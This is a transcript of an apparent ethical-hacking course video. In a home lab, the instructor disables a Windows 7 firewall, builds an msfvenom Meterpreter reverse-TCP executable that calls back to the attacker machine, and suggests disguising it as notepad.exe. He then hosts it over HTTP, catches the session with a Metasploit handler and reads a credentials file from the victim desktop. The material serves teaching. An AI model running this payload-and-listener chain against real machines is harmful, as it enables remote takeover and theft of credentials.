Hello. So in this module, we are going to do the system hacking. And to do so, we need to configure a few things. So first of the thing will be the operating systems. So we are using Windows 7 here. And I can just showcase you. We'll do a system info. And you should be able to see the system information coming up here. Okay. So this will show us this is a Windows 7 machine. And after that, we will be running a Kali Linux machine. The subnet we are using on these machines is slightly different from 192.168.103.14, and where you can see it's running Windows 7 Professional, and the IP address is 31 dot something, 31.18. You can see it here. Now, in Linux machine, we have to ensure there's a Metasploit installed, M07 is installed, and then we can ping these two machines from one side to other side. So I ran the commands and there is the output. You can see the command is here and you can read the output like this here. The next thing we did is check the firewall settings, and I used NetSH ADV firewall, show all profiles state, and it shows you the firewalls. To turn it off, you run PowerShell as admin privilege and then run the same command. Instead of doing the show all profiles state, you do set all profile state off to turn off your firewalls. Okay, so let's go and check these things real quick. So I'll do next stat show all profiles state. It should show us off because I set it to off. If I do set all profile on and then do this command, it will show on. If we do set all profile off and then do show all profile state, it should show us this is the off. So command is netsh space adv firewall space show space all profiles and then space state. It will show you the profiles. Okay. If you do the set command, it will show you it will give you the permission to set or unset them. And you can see this terminal says administrator in top. And to get this thing, you actually have to click on the start button, type PowerShell here, then right click on the PowerShell and then click on run as administrator. It will give you a USC prompt. You click on yes, and the terminal you will get that will have administrator in front of it, and this is the elevated prompt that you wanna require. To connect a Linux machine, I'm using a tool here. So I'm gonna go here and type my Linux machine's IP address. I just wanted to have all those things in one place. So it's 16. The username is Kali, password is Kali. Okay, I guess I must type in my password. And let's set this screen to look a little bit better. So go to Windows, Appearance, and then we'll set our thing to 18. Now it's readable now. Awesome. So I'll do sudo at list Metasploit, and we'll do Metasploit framework. Type my password again, and it says it's installed. The same thing you will see in our note in Linux VM. I check my IP address, did this command, it says install, and the next thing we moved into is generating our payload. To payload generation, I am running MSF Venom -- Arch x64 platform is Windows, and then P for payloads. This is our payload here, and then some arguments for the payload, and we're telling payload, hey, once you run successfully, send a reverse connection to these things. The F for the file format, we are using exe file format, and the output saved as malware.exe. So let's run this command on our Linux machine. Okay, so do so. I'm gonna do one quick thing. I'll make a directory, running it as www rm-r. I already have this directory for some reason. mkdir www cd www. So we are into a directory where we have no files for now, right? So we're gonna go and create the directory. So we'll do msf venom -- arch x64. So it's telling the architecture will be x64, that is 64-bit platform. So we're telling them, hey, the platform we are using is Windows, and then the payload I'm gonna use Windows. That's actually goes here. x64 Metasploit reverse _ TCP, and the option is lhost, that will my local host IP address. It have to be your Linux machine's IP address. In my case, that is 192.168.31.16. Now, in your case, you check your IP address and type that IP address here. Now, the port, you can set it on any numbers. For this demonstration, I'm going to set it to 1337. The file format will be exe, and then the output will be malware.exe. You can name your malware output file to anything else. Okay, you can name it like notepad.exe or something like that. And that was unexpected. Let me fix my PuTTY terminal and then I'll come back. Okay, so we are running it again. And let me just give it a few seconds to finish. And here we get the output. So we have a payload of 510 bytes, right? So if we do ls, we see malware.exe. Now the next thing we're going to do is host this malware. So to do so, I have created this command here. So mkdir www move malware to www and then start the web server. We already have done this too. Like we created a directory www and we have the malware inside www. So we're not going to do that. We'll just focus on the third command, that is sudo python3 and then -m http.server 80. Now it will invoke Python's module for HTTP server and start a web server for us. So we'll do sudo python3 -m http.server on port 80. Now it should start the server. Yes, awesome. So we will start the server, download the payload, and then we're gonna start the listener for the backdoor connection. So this is here. Open up the Internet Explorer. Go to the IP address, that is 192.168.31.16. Download this malware.exe. So I'm gonna save this file. So I'll click on save. Save it to my desktop. Right? Click on save. File is saved. I'm gonna close it up. Minimize my browser. We can see there's a GET request on malware.exe. We see in our desktop. Everything is fine. Next thing is we're gonna start our Metasploit framework. So we'll do sudo msfdb run. It will start our Metasploit framework in backend. And we should see a graphical command interface here. Okay, is it started? Now we're gonna do, first thing is we're gonna start a multi-handler. So we'll do use exploit multi-handler, and after that it says the using configured payload is generate shell reverse TCP, but the payload we used is not that. So if you do like show payloads, or just do a show options, and show options, the payload says generate shell reverse TCP. We don't want that because we create our own custom payload. So that is Windows. You can use tab to autocomplete. Okay, hit tab, it takes few seconds to autocomplete. Once that is done, we can just do this, and that is kind of easy to complete that commands. Then we'll do set lhost to the IP address, so that is 192.168.31.16. Remember, this have to be your Linux machine's IP address. Set L port, the port number that we use to create this malware. If you go a little bit up, we can see the L port we set to 1337. So I'm going to use the same settings here. Now, we told our payload that we are going to listen on this port or in this, in this IP address on this port. So we are configuring that same thing in our listening modules. We can do a show options to verify everything works fine. And then we're going to do an exploit -J. So J will run this exploit in background so we can have multiple sessions. Okay, so we see started on this IP address. Let's double click on the malware, and it says unknown publisher. So Microsoft does not know who created this malware executable file. If that is a known program, you would have seen a name here, right? So we click on run button, and nothing happened on my computer. But in attacker machine, we see there is session 1 is opened on the IP address. If you do sessions and hit enter, we see there is a session ID 1 is opened up. Now I'm going to go into full screen so I can hide the backend or background. So we do a sessions again. So we see there is a sessions running on WhizHack VM as a WhizHack user. To interact with the session, I'll do session-I and the ID number, that is 1. Now the prompt is changed to Metasploit. That was our backdoor shell, right? If you do sysinfo, it will show us system information. So this is WhizHack VM running Windows 7, 64-bit architecture. There's a 4 logged in users from different locations, and the shell is 64-bit Windows, right? Now we can do many things, but most likely let's do a PWD to see where we are. We are into desktop, so we'll do edit, not exit, edit, and create a file. We'll name it as a hacker.txt, and we're gonna say hello, this is your friendly hacker doing hacking stuff. Thanks. And then we must save this file to the desktop. Now, once we've done all those things, I can minimize this window, and we should see there's a file called hacker. If you open this file and says the same message like, hello, this is a friendly hacker. I had a typo, so that should be hacker doing hacking stuff, thanks. Now let's suppose there is a different file, right? We do have files in our desktops, right? So let's create a text file, and we're gonna name it as super secret, right? And this file going to contain some of my username and password. Right? So to do so, okay, something weird happened. Just give me 1 second. Okay, so we have a super secret file here. Now I'm gonna type my user account. So first one will be my Gmail, and I'll just type a username, right? And username says what we should call our user. Let's call it Bob at gmail.com. Password, I cannot remember my password, so I'm gonna type my password. Please don't hack 123. Right, this is my password on a file on my desktop. Right, this is super handy. If I forgot my password, I can just double click on this file and I can see the information. Now see, as an attacker, this is the attacker window, right? If we do pwd, we are in this location. If we do ls, we see there is a file says supersecret.txt. I can read this file. I can do cat. Now this cat is not our home cat. This actually helps us to read files using command line. So I'll do cat and then supersecret.txt, and we can read the message, right? Here is the password and the username. Okay, so we can do many other things. If you do help, we can see the different options that we can do. If you go a little bit up, so we can check the files. We did pwd, right? There's a search to search for a file, right? There's a many different commands that we can do and use it. Okay, so give it a try by yourself and see what else you can come up with. Try to explore up these commands and see what else you can do. There is options that will help you to download a file or upload a file. Try those options and see what informations you can upload or you can download. Okay, so in this note, we're gonna ending up this video here. If you do have any questions, put it in classroom and I will be answering it. Thank you.